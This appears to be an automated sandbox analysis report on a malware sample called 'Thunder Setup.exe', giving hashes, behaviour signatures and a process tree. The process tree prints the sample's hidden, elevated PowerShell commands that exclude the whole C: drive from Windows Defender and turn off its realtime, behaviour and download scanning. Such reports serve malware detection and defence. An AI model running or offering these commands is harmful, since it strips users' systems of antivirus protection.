Analysis
-
max time kernel
359s -
max time network
372s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14-07-2024 22:14
Static task
static1
Behavioral task
behavioral1
Sample
Thunder Setup.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Thunder Setup.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Thunder Setup.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
Thunder Setup.exe
Resource
win11-20240709-en
General
-
Target
Thunder Setup.exe
-
Size
78KB
-
MD5
1eb797341e423c83060a36b92c720cc9
-
SHA1
380828212f0bb9a82d568491247a590a316e4351
-
SHA256
0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
-
SHA512
9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
-
SSDEEP
1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 2012 Powershell.exe 1924 Powershell.exe 1888 Powershell.exe 1052 Powershell.exe 2012 Powershell.exe 688 powershell.exe 2500 powershell.exe 1244 powershell.exe 1940 powershell.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1888 Powershell.exe 1052 Powershell.exe 1924 Powershell.exe 2012 Powershell.exe 1888 Powershell.exe 1888 Powershell.exe 2012 Powershell.exe 2012 Powershell.exe 1052 Powershell.exe 1052 Powershell.exe 1924 Powershell.exe 1924 Powershell.exe 2500 powershell.exe 1940 powershell.exe 688 powershell.exe 1244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1052 Powershell.exe Token: SeDebugPrivilege 1924 Powershell.exe Token: SeDebugPrivilege 1888 Powershell.exe Token: SeDebugPrivilege 2012 Powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 688 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1792 javaw.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 2444 wrote to memory of 1792 2444 Thunder Setup.exe 30 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 2012 1792 javaw.exe 31 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1924 1792 javaw.exe 32 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1888 1792 javaw.exe 34 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1792 wrote to memory of 1052 1792 javaw.exe 35 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1924 wrote to memory of 2500 1924 Powershell.exe 39 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 1888 wrote to memory of 1940 1888 Powershell.exe 41 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 2012 wrote to memory of 688 2012 Powershell.exe 43 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45 PID 1052 wrote to memory of 1244 1052 Powershell.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD598c23a8076e4f61d1696e98bda90397a
SHA185e85c234f90f34d944b9a0a5e50d856611fcb10
SHA256c3e8e888daacc91a2138eab06d023c79798dce08c48d65a50dc2ecdb1e130071
SHA512397799b0b902b94e9cee6700c8d64e6593faab01b390061fde4d408ed82c6ff92370dfa70971349090492fbde859f1de4777b3b6949bdacde2330995a9d57738